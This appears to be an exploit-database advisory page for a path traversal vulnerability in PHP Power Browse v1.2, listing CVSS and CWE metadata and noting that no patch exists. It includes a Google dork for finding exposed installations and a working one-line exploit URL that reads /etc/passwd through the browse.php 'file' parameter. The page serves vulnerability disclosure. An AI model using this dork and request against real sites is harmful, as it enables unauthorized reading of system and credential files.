header-logo
Suggest Exploit
vendor:
PHP Power Browse
by:
Manuel Mancera (sinkmanu)
7.5
CVSS
HIGH
Path traversal
22
CWE
Product Name: PHP Power Browse
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

PHP Power Browse v1.2 – Path Traversal

This file browser is vulnerable to path traversal and allow to an attacker to access to files and directories that are stored outside the web root folder.

Mitigation:

Source

Exploit-DB raw data:

# Exploit Title: PHP Power Browse v1.2 - Path Traversal
# Google Dork:
    intitle:PHP Power Browse inurl:browse.php
# Exploit Author: Manuel Mancera (sinkmanu)    |    sinkmanu (at) gmail
(dot) com
# Software URL: https://github.com/arzynik/PHPPowerBrowse
# Version: 1.2
# Vulnerability Type : Path traversal
# Severity : High

### Description ###

This file browser is vulnerable to path traversal and allow to an
attacker to access to files and directories that are stored outside the
web root folder.

### Exploit ###

http://site/browse.php?p=source&file=/etc/passwd

Navigation

Suggest Exploit

Services By CQR